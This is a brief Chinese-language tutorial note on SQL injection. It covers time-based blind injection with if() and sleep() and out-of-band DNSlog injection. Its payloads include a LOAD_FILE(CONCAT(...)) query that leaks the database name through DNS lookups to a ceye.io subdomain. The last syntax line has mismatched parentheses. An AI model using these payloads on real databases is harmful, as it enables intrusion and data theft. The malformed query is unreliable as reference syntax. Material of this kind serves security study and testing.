时间盲注
原理:构造语句,通过页面响应的时长,来判断信息。
方法:构造逻辑语句,通过条件语句进行判断,为真则立即执行,否则延时执行
核心语法:
if(left(user(),1)='a',0,sleep(3));
Dnslog盲注
dnslog是用户访问网站过程中被dns服务记录的信息
原理: 通过布尔或时间盲注效率很低,需要发送很多的请求进行判断,很可能触发安全设备的防护,我们需要一种方式,减少请求,直接回显数据,这里就使用dnslog实现注入。
dnslog平台 :http://ceye.io/
mysql LOAD_FILE函数可以发起请求:
SELECT LOAD_FILE(CONCAT('\\','test','.mysql.d1egqb.ceye.io\abc'));
方法:
构造语句,利用load_file()函数发起请求,使用dnslog接受请求,获取数据
核心语法:
SELECT LOAD_FILE(CONCAT('\\',select database()),'.mysql.d1egqb.ceye.io\abc'));
load_file()函数只能在windows操作系统上使用,linux操作系统不能使用